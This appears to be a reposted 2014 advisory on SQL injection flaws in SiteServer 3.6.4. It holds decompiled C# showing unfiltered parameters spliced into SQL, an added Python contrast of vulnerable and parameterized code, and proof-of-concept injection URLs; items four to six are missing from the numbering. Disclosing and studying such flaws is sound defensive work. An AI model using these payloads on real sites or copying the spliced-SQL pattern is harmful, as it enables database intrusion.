SiteServer latest version 3.6.4 SQL injection vulnerability warning - Black Bar Safety Net

2014-01-07T00:00:00
ID MYHACK58:62201441724
Type myhack58
Reporter Anonymous (佚名)
Modified 2014-01-07T00:00:00

Description

1. http://xxx.com/siteserver/service/background_taskLog.aspx?Keyword=test%' and @@version=1 and 2='1&DateFrom=&DateTo=&IsSuccess=All

The injection point is the Keyword parameter, which reaches the query with no filtering at all. Every kind of SQL injection is possible here: executing OS commands, dumping the database.

2. The second injection is in siteserver/platform/background_log.aspx

Use .NET Reflector to decompile the file BaiRong.BackgroundPages.dll.

The code is as follows:

    this.spContents.ConnectionString = BaiRongDataProvider.ConnectionString;
    flag = base.Request.QueryString["UserName"] != null;
    if (!flag)
    {
        this.spContents.SelectCommand = BaiRongDataProvider.LogDAO.GetSelectCommend();
    }
    else
    {
        // all four query-string values are handed to the SQL builder unchanged
        this.spContents.SelectCommand = BaiRongDataProvider.LogDAO.GetSelectCommend(base.Request.QueryString["UserName"], base.Request.QueryString["Keyword"], base.Request.QueryString["DateFrom"], base.Request.QueryString["DateTo"]);
    }

None of these parameters is effectively filtered.

Proof of concept:

http://www.target.com/siteserver/platform/background_log.aspx?UserName=test&Keyword=1&DateFrom=20120101'%20and%20@@version=1%20and%201='test&DateTo=test

3. The third injection is in usercenter/platform/user.aspx

Use .NET Reflector to decompile the file UserCenter.Pages.dll.

The code is as follows:

    if (!string.IsNullOrEmpty(base.Request.QueryString["Lock"]))
    {
        str = base.Request.QueryString["UserNameCollection"];
        userNameArrayList = TranslateUtils.StringCollectionToArrayList(str);
        UserDataProvider.UserDAO.Lock(userNameArrayList, true);
        LogUtils.AddLog("user:" + UserDataProvider.UserDAO.CurrentUserName, "locking users", string.Format("user:{0}", str));
    }

When Lock is not empty, UserNameCollection is passed into the UserDataProvider.UserDAO.Lock function:

    public void Lock(ArrayList userNameArrayList, bool isLockOut)
    {
        // the user names are quoted and spliced straight into the IN (...) list
        string commandText = string.Format("UPDATE bairong_Users SET IsLockedOut = '{0}' WHERE [UserName] IN ({1})", isLockOut.ToString(), TranslateUtils.ObjectCollectionToSqlInStringWithquote(userNameArrayList));
        base.ExecuteNonQuery(commandText);
        UserManager.Clear();
    }

UserNameCollection is not effectively filtered.

http://www.target.com/usercenter/platform/user.aspx?UnLock=sdfe'&UserNameCollection=test')%20and%20@@version=2;%20--
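To make the Lock() pattern above concrete, here is an added example (not the product's code) in Python, with SQLite standing in for SQL Server: the string-spliced IN list as in the decompiled method beside a parameterized version, both run against a constructed bairong_Users table with a value of the same shape as the UserNameCollection payload above.

```python
import sqlite3

# Constructed in-memory stand-in for the bairong_Users table that Lock() updates.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE bairong_Users (UserName TEXT PRIMARY KEY, IsLockedOut TEXT)")
    con.executemany("INSERT INTO bairong_Users VALUES (?, ?)",
                    [("alice", "False"), ("bob", "False"), ("o'neil", "False")])
    return con

def lock_vulnerable(con, user_names, is_lock_out):
    """Same construction as the decompiled Lock(): each name is wrapped in quotes
    and spliced into the IN list, so a quote inside a name becomes SQL syntax."""
    in_list = ", ".join("'%s'" % n for n in user_names)
    sql = ("UPDATE bairong_Users SET IsLockedOut = '%s' WHERE [UserName] IN (%s)"
           % (str(is_lock_out), in_list))
    cur = con.execute(sql)
    con.commit()
    return cur.rowcount  # rows actually updated

def lock_safe(con, user_names, is_lock_out):
    """Hardened form: one placeholder per name, values bound separately from the
    SQL text, so every name is only ever compared as data."""
    if not user_names:
        return 0
    placeholders = ", ".join("?" for _ in user_names)
    sql = ("UPDATE bairong_Users SET IsLockedOut = ? WHERE [UserName] IN (%s)"
           % placeholders)
    cur = con.execute(sql, [str(is_lock_out)] + list(user_names))
    con.commit()
    return cur.rowcount

def locked_users(con):
    rows = con.execute(
        "SELECT UserName FROM bairong_Users WHERE IsLockedOut = 'True' ORDER BY UserName")
    return [r[0] for r in rows]

def demo():
    # Constructed value in the shape of the page's payload: closes the IN list
    # early and appends a condition of its own, the rest is commented out.
    injected = "alice') AND 1=1 --"
    vuln = make_db()
    rows_vuln = lock_vulnerable(vuln, [injected], True)  # injected SQL runs: alice locked
    safe = make_db()
    rows_safe = lock_safe(safe, [injected], True)        # treated as a name: nobody locked
    return rows_vuln, locked_users(vuln), rows_safe, locked_users(safe)
```

The spliced version also breaks on a legitimate name such as o'neil (a SQL syntax error), while the parameterized one locks that account correctly.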

7. The seventh injection is in /UserCenter/cms/contents.aspx

Use .NET Reflector to decompile the file UserCenter.Pages.dll.

The code is as follows:

    int totalCount;
    bool flag;
    string keyword = this.Keyword.Text.Trim();
    // the uint comparisons and "if (0 != 0)" are always-true / always-false checks
    // left by obfuscation; the real logic is the block below
    if ((((uint) totalCount) - ((uint) flag)) <= uint.MaxValue)
    {
        string start = this.start.Value;
        if (0 != 0)
        {
            return;
        }
        string end = this.end.Value;
        if ((((uint) flag) - ((uint) flag)) <= uint.MaxValue)
        {
            base.SetPublishmentSystemID(TranslateUtils.ToInt(this.ddlPublishmentSystemID.SelectedValue));
            this.spContents.ControlToPaginate = this.dlContents;
            this.dlContents.ItemDataBound += new RepeaterItemEventHandler(this.x140df91522580d1f);
            this.spContents.ItemsPerPage = 30;
            this.spContents.ConnectionString = BaiRongDataProvider.ConnectionString;
            this.spContents.SelectCommand = DataProvider.ContentDAO.GetSelectCommendOfTouGao(base.PublishmentSystemInfo.AuxiliaryTableForContent, base.PublishmentSystemID, start, end, keyword, base.UserName, this.touGaoType);
        }
        this.spContents.SortField = "ID";

Note the keyword variable: it is taken from this.Keyword.Text.Trim() and passed straight into GetSelectCommendOfTouGao.
